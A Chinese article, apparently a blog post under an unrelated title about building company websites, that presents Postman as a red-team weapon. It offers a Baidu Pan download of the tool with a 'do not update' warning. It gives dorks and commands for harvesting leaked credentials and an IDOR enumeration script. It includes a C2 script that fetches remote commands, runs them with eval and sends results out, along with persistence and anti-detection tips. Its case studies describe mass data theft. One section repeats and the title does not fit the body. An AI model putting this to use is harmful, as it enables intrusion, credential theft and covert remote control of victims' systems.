企业官网建设流程全解析

什么是postman？

Postman 是全球最流行的API（应用程序编程接口）开发、测试和协作平台，最初于 2012 年作为 Chrome 扩展发布，现已发展成为一个覆盖 API 全生命周期的完整生态系统。简单来说，它是一个让你能发送请求、查看响应、自动化测试、管理 API 文档的一站式工具。

工具下载地址（一定要先转存！！！）

百度网盘链接：
https://pan.baidu.com/s/1jjldqTL4GPepxmori7S85Q?pwd=8888 提取码: 8888
（不要更新！！！）

红队视角下的postman

在现代红队作战中，API 已经成为第一攻击面，而 Postman 绝非仅仅是开发人员的 API 测试工具。对于顶级红队而言，Postman 是一款能够贯穿 “侦察 - 攻击 - 后渗透 - 持久化” 全攻击链的多用途武器，其价值远超 Burp Suite、Metasploit 等传统工具在特定场景下的表现。本文将从红队实战角度，全面解析 Postman 的战术价值与高级应用技巧。

一、为什么 Postman 是 API 攻击的首选工具？

Postman 在红队武器库中占据独特地位，核心优势在于：

• 零信任绕过：Postman 生成的请求与合法开发人员请求完全一致，大多数 WAF、IDS/IPS 无法区分，可轻松绕过基于 “异常流量” 的检测机制
• 原生支持所有 API 协议：REST、GraphQL、SOAP、WebSocket、gRPC 全覆盖，无需额外插件
• 强大的脚本引擎：基于 Node.js 的 Pre-request 和 Tests 脚本，可实现复杂的攻击逻辑自动化
• 生态系统优势：全球数百万开发者使用，公共工作区和集合中蕴藏着海量敏感信息
• 跨平台一致性：Windows/Linux/macOS/Web 端行为完全一致，便于团队协作与攻击链移植

二、Postman OSINT - 最容易被忽视的金矿

红队的攻击往往从无需与目标直接交互的 OSINT 开始，而 Postman 平台本身就是一个巨大的情报宝库。

1、公共工作区与集合枚举

核心战术：通过搜索引擎和 Postman API 枚举目标相关的公共资源，直接获取生产环境凭证。

• Google Dorks：

site:postman.com "workspace" "target.com" site:postman.com "collection" "api.target.com" site:postman.com "environment" "Bearer"

• Postman API 无认证枚举：

# 获取所有公共工作区元数据curl-s"https://api.getpostman.com/workspaces"|jq'.workspaces[] | {name, id}'# 根据工作区ID获取所有集合curl-s"https://api.getpostman.com/workspaces/{WORKSPACE_ID}/collections"|jq'.collections[].name'# 下载完整集合JSONcurl-s"https://api.getpostman.com/collections/{COLLECTION_ID}"-ocollection.json

• 敏感信息提取：

grep-iE"api[_-]?key|secret|token|password|Bearer|Authorization|refresh_token"collection.json

实战价值：根据安永 2025 年报告，超过 30,000 个可公开访问的 Postman 工作区泄露了敏感信息，其中包括生产环境 API 密钥、数据库连接字符串、JWT 刷新令牌等。这些凭证通常拥有最高权限，且无需 2FA 验证，可直接接管整个系统。

2、内部 API 结构逆向

当获取到部分 API 请求后，Postman 可快速构建完整的 API 攻击面：

• 流量捕获与导入：启用 Postman 内置代理，捕获浏览器或移动应用流量，自动生成结构化集合
• OpenAPI/Swagger 导入：导入目标的 API 文档，一键生成所有端点的测试请求
• 端点推测与枚举：基于常见命名模式，使用 Collection Runner 批量探测隐藏端点

三、攻击阶段：Postman 驱动的 API 漏洞利用

Postman 在漏洞利用阶段的核心优势是可精确控制请求的每一个字节，同时提供直观的响应分析界面。

1、认证与授权漏洞利用

IDOR（不安全直接对象引用）自动化检测：

// Pre-request Script：自动遍历用户IDconstcurrentUserId=pm.environment.get("current_user_id");consttargetIds=pm.environment.get("target_ids").split(",");letcurrentIndex=parseInt(pm.environment.get("current_index"))||0;if(currentIndex<targetIds.length){pm.environment.set("target_id",targetIds[currentIndex]);pm.environment.set("current_index",currentIndex+1);}// Tests Script：检测越权成功pm.test("IDOR Vulnerability Detected",function(){if(pm.response.code===200){constjsonData=pm.response.json();if(jsonData.user_id!==pm.environment.get("current_user_id")){console.log(`[!] IDOR Found: User${currentUserId}accessed User${pm.environment.get("target_id")}`);pm.environment.set("idor_found","true");}}});

JWT 攻击：

• 使用 Postman 内置的 JWT 解码器查看令牌内容
• 测试alg: none签名绕过
• 测试密钥混淆攻击（将 RS256 改为 HS256）
• 利用刷新令牌漏洞获取永久访问权限

2、注入攻击与逻辑漏洞

SQL 注入自动化：使用 Collection Runner 加载包含数百个 SQLi payload 的 CSV 文件，批量测试所有参数
批量赋值（Mass Assignment）攻击：
1、从 GET 响应中提取所有字段
2、在 POST/PUT 请求中添加敏感字段（如is_admin: true、role: admin）
3、观察响应是否接受并应用这些未授权修改
业务逻辑漏洞：

• 测试负数值、零值、极大值在支付、积分等接口中的行为
• 测试并发请求导致的竞态条件
• 测试请求重放攻击（尤其是在支付和验证码接口）

四、后渗透阶段：Postman 作为 C2 通道与权限维持工具

红队的标志是将合法工具武器化，Postman 在这方面表现尤为出色。

1、利用 Postman 实现无文件 C2

核心原理：利用 Postman 的脚本引擎执行任意 JavaScript 代码，通过 API 请求与 C2 服务器通信。

// Tests Script：从C2服务器获取命令并执行pm.sendRequest("https://c2.target.com/get-command",function(err,res){if(err)return;constcommand=res.json().command;letresult;try{// 执行JavaScript代码result=eval(command);}catch(e){result=e.toString();}// 发送执行结果回C2服务器pm.sendRequest({url:"https://c2.target.com/report-result",method:"POST",body:{mode:"raw",raw:JSON.stringify({result:result})}});});

优势：

• 完全在 Postman 进程内运行，无文件落地
• 流量与正常 API 测试流量无异，难以检测
• 利用 Postman 的网络代理设置绕过防火墙限制

2、权限维持

刷新令牌劫持：

• 从 Postman 环境变量中提取刷新令牌
• 编写脚本定期使用刷新令牌获取新的访问令牌
• 即使原始密码被更改，仍可保持访问权限

Postman API Key 持久化：

• 获取目标团队的 Postman API Key
• 通过 Postman API 持续监控团队工作区的更新
• 自动提取新添加的凭证和 API 端点

五、自动化与规模化攻击

Postman 的自动化能力使其能够从单个工具扩展为整个红队的攻击平台。

1、Collection Runner 高级应用

• 数据驱动攻击：支持 JSON/CSV 格式的数据源，可同时测试数千个 payload
• 条件执行：基于前一个请求的响应结果决定后续请求是否执行
• 并行执行：同时运行多个请求，提高攻击效率
• 报告生成：自动生成 HTML 格式的攻击报告，包含所有请求和响应细节

2、与其他红队工具的协同

Postman + Burp Suite：

• 将 Postman 流量代理到 Burp Suite，利用 Burp 的被动扫描和 Intruder 功能
• 将 Burp 捕获的请求导出为 cURL 格式，再导入 Postman 进行深入测试

Postman + Metasploit：

• 使用 Postman 验证漏洞后，生成 Metasploit 模块进行大规模利用
• 将 Metasploit 获取的凭证导入 Postman 环境变量，继续后续攻击

Postman + Metasploit：

• 使用 Postman 验证漏洞后，生成 Metasploit 模块进行大规模利用
• 将 Metasploit 获取的凭证导入 Postman 环境变量，继续后续攻击

六、反检测与绕过技巧

红队使用 Postman 时，会特别注意不留痕迹：

• 禁用云同步：使用离线模式，防止攻击数据被同步到 Postman 云端
• 清理历史记录：每次攻击后删除所有请求历史和缓存
• 伪造 User-Agent：使用与目标开发人员一致的 User-Agent
• 请求间隔控制：在 Collection Runner 中设置合理的延迟，避免触发速率限制
• IP 轮换：配合代理池使用，防止 IP 被封禁

七、局限性与替代方案

尽管 Postman 功能强大，但仍有其局限性：

• 不支持原始 TCP/UDP 协议：对于非 HTTP 协议的 API，需要使用其他工具
• 脚本引擎限制：无法执行系统命令或访问本地文件系统（这也是其作为 C2 通道的优势）
• 不支持高级模糊测试：对于复杂的二进制协议或深度模糊测试，需要使用专业工具

替代方案：

• Insomnia：轻量级，开源，无云同步强制要求
• HTTPie：命令行工具，适合自动化脚本
• curl：最基础但最可靠的 HTTP 客户端，几乎在所有系统上都可用

八、红队实战案例

案例 1：某大型电商 API 接管

• 通过 Google Dork 发现目标的公共 Postman 工作区
• 提取到生产环境的 JWT 刷新令牌和 API 密钥
• 使用 Postman 遍历所有用户订单信息，获取超过 100 万条用户数据
• 利用管理员 API 密钥修改支付接口配置，实现任意金额支付

案例 2：某 SaaS 平台权限提升

• 捕获普通用户的 API 请求并导入 Postman
• 发现用户信息接口存在 IDOR 漏洞
• 使用 Collection Runner 遍历所有用户 ID，获取管理员邮箱
• 利用密码重置接口接管管理员账户

总结

Postman 不仅仅是一个工具，更是一种思维方式。它教会我们从开发者的角度思考 API 的设计与实现，从而发现那些自动化扫描器无法发现的逻辑漏洞。在 API 主导的今天，掌握 Postman 的高级攻击技巧，已经成为每一个红队成员的必备技能。
记住：最好的攻击，看起来就像正常的业务操作。而 Postman，正是实现这一目标的最佳工具。